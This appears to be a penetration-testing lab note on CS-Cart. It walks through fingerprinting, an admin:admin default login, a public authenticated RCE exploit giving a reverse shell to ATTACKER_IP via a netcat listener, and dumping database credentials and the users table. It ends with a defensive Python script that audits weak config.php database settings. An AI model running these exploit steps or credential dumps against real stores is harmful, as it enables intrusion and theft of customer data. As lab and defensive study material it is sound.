# CS-Cart

CS-Cart is PHP shopping cart software. Older exposed installs may allow admin login with default credentials and authenticated RCE through public exploit tooling.

## Discovery

Useful indicators:

```
80/tcp open  http  Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
```

WhatWeb may show:

```
Apache[2.2.4], CS-Cart, PHP[5.2.3-1ubuntu6], PasswordField[password], Title[CS-Cart. Powerful PHP shopping cart software]
```

Useful application paths:

```
http://TARGET/index.php?target=sitemap
http://TARGET/index.php?target=profiles&mode=update
```

## Default Admin Login

Try the default admin credentials:

```
admin:admin
```

## Authenticated RCE

Public exploit used:

```
https://github.com/reatva/CS-Cart-1.3.3-RCE
```

Start a listener:

```bash
nc -nlvp 80
```

Run the exploit with the working admin credentials:

```bash
python3 Cs-Cart.py -U http://TARGET -u admin -p admin -L ATTACKER_IP -P 80
```

Successful output:

```
[+] Login Successful
[+] Payload uploaded successfully.
[+] Open up netcat to receive reverse shell on ATTACKER_IP:80
```

Successful shell context:

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/skins
```

## Database Credentials

CS-Cart database credentials may be in `config.php`:

```php
$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';
```

Connect locally from the target:

```bash
mysql -u root -h localhost -p
```

Useful database enumeration:

```sql
show databases;
use cscart;
show tables;
select * from cscart_users\G
```
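
The `config.php` values shown above (a `root` database user whose password equals the username) can be flagged by a configuration audit. This is an added example, not part of the original notes; the function names, the weak-password list and both sample configs are constructed assumptions.

```python
import re

# Matches simple PHP string assignments such as: $db_user = 'root';
# Lines commented out with // or # do not match because of the ^\s*\$ anchor.
ASSIGN_RE = re.compile(r"""^\s*\$(db_\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.MULTILINE)

# Constructed list of trivially guessable passwords (assumption; extend as needed).
WEAK_PASSWORDS = {"", "root", "admin", "password", "cscart", "toor", "123456"}

def parse_db_settings(php_source):
    """Return {name: value} for the $db_* string assignments in config.php."""
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(php_source)}

def audit_db_settings(settings):
    """Return a list of findings for the parsed database settings."""
    findings = []
    user = settings.get("db_user", "")
    password = settings.get("db_password", "")
    if user == "root":
        findings.append("db_user is the MySQL superuser; use a dedicated least-privilege account")
    if password.lower() in WEAK_PASSWORDS:
        findings.append("db_password is empty or trivially guessable")
    if user and password == user:
        findings.append("db_password equals db_user")
    return findings

# Constructed sample mirroring the values shown on this page.
WEAK_CONFIG = """
$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';
"""

# Constructed sample of a corrected configuration (placeholder values).
HARDENED_CONFIG = """
$db_host = 'localhost';
$db_name = 'cscart';
// $db_user = 'root';
$db_user = "cscart_app";
$db_password = "PLACEHOLDER-long-random-value";
"""

if __name__ == "__main__":
    for label, source in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_db_settings(parse_db_settings(source)) or "no findings")
```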

